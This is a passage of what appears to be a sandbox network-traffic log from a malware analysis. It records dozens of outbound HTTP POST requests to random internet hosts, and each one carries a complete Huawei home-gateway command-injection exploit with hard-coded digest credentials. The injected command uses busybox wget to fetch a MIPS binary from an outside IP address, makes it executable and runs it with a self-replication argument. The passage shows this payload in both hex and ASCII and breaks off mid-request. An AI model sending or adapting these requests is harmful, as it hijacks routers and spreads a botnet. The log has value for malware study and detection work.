69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  707192.168.2.135315841.146.26.3537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.373986959 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  708192.168.2.134528641.212.165.16737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.374013901 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  709192.168.2.1337484197.145.100.1937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.374159098 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  710192.168.2.1358102157.128.70.13137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.374195099 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  711192.168.2.1350634157.21.85.16037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.374227047 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  712192.168.2.1339788193.194.14.17637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.374325037 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  713192.168.2.1347806197.91.128.8037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.374385118 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  714192.168.2.133381458.187.70.18737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.374401093 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  715192.168.2.134980414.248.167.13037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.374418020 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  716192.168.2.1360052197.118.83.9037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.374439955 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  717192.168.2.1353264157.113.239.12037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.374461889 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
